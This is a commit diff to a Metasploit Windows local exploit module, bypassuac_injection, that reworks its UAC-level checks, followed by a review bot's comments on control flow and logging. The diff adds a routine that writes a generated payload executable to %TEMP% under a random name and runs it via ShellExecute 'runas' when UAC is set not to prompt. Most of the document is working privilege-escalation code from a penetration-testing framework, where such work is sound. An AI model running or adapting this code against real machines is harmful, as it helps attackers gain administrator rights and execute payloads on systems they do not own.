Update bypassuac_injection inline with latest privs lib
parent
e6a2a1006f
commit
6fdf5cab15
|
@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Exploit::EXE
|
include Exploit::EXE
|
||||||
include Post::Common
|
|
||||||
include Post::File
|
include Post::File
|
||||||
include Post::Windows::Priv
|
include Post::Windows::Priv
|
||||||
|
|
||||||
|
@ -52,9 +51,20 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def runas_method
|
||||||
|
payload = generate_payload_exe
|
||||||
|
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||||
|
tmpdir = expand_path("%TEMP%")
|
||||||
|
tempexe = tmpdir + "\\" + payload_filename
|
||||||
|
write_file(tempexe, payload)
|
||||||
|
print_status("Uploading payload: #{tempexe}")
|
||||||
|
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
|
||||||
|
print_status("Payload executed")
|
||||||
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin?
|
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
||||||
|
|
||||||
#
|
#
|
||||||
# Verify use against Vista+
|
# Verify use against Vista+
|
||||||
|
@ -65,25 +75,27 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
if is_uac_enabled?
|
if is_uac_enabled?
|
||||||
vprint_status "UAC is Enabled, checking level..."
|
print_status "UAC is Enabled, checking level..."
|
||||||
else
|
else
|
||||||
fail_with(Exploit::Failure::NotVulnerable,
|
if is_in_admin_group?
|
||||||
"UAC is not enabled, no reason to run module, exiting...\r\nRun exploit/windows/local/ask to elevate"
|
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
|
||||||
)
|
else
|
||||||
|
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
case get_uac_level
|
case get_uac_level
|
||||||
when UACPromptCredsIfSecureDesktop, UACPromptConsentIfSecureDesktop, UACPromptCreds, UACPromptConsent
|
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
|
||||||
fail_with(Exploit::Failure::NotVulnerable,
|
fail_with(Exploit::Failure::NotVulnerable,
|
||||||
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
|
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
|
||||||
)
|
)
|
||||||
when UACDefault
|
when UAC_DEFAULT
|
||||||
print_good "UAC is set to Default"
|
print_good "UAC is set to Default"
|
||||||
vprint_status "BypassUAC can bypass this setting, continuing..."
|
print_good "BypassUAC can bypass this setting, continuing..."
|
||||||
when UACNoPrompt
|
when UAC_NO_PROMPT
|
||||||
fail_with(Exploit::Failure::NotVulnerable,
|
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
|
||||||
"UAC is not enabled, no reason to run module\r\nRun exploit/windows/local/ask to elevate"
|
runas_method
|
||||||
)
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
# Check if you are an admin
|
# Check if you are an admin
|
||||||
|
@ -97,13 +109,11 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
if admin_group
|
if admin_group
|
||||||
print_good('Part of Administrators group! Continuing...')
|
print_good('Part of Administrators group! Continuing...')
|
||||||
else
|
else
|
||||||
print_error('Not in admins group, cannot escalate with this module')
|
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
|
||||||
print_error('Exiting...')
|
|
||||||
return
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
if get_integrity_level == LowIntegrityLevel
|
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
|
||||||
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
|
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
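Review bot: The new `when UAC_NO_PROMPT` branch calls `runas_method` and then hits `return`, so that path never reaches the Administrators-group check or the `INTEGRITY_LEVEL_SID[:low]` guard further down in `exploit`; the lines between the hunks are not shown, so this is inferred from the hunk order. If those preconditions are meant to hold for every path, evaluate them before `case get_uac_level`, or add a comment on the branch saying why they do not apply. `runas_method` is also undocumented: a header comment such as `# Writes the payload EXE to %TEMP% under a random 6-13 letter name and starts it via ShellExecuteA with the "runas" verb` would record the file and process artifacts this path leaves, and the bare `5` would read better as a named constant (SW_SHOW). `print_status("Payload executed")` runs without looking at the ShellExecuteA return value, so it reports that the call was made, not that it succeeded.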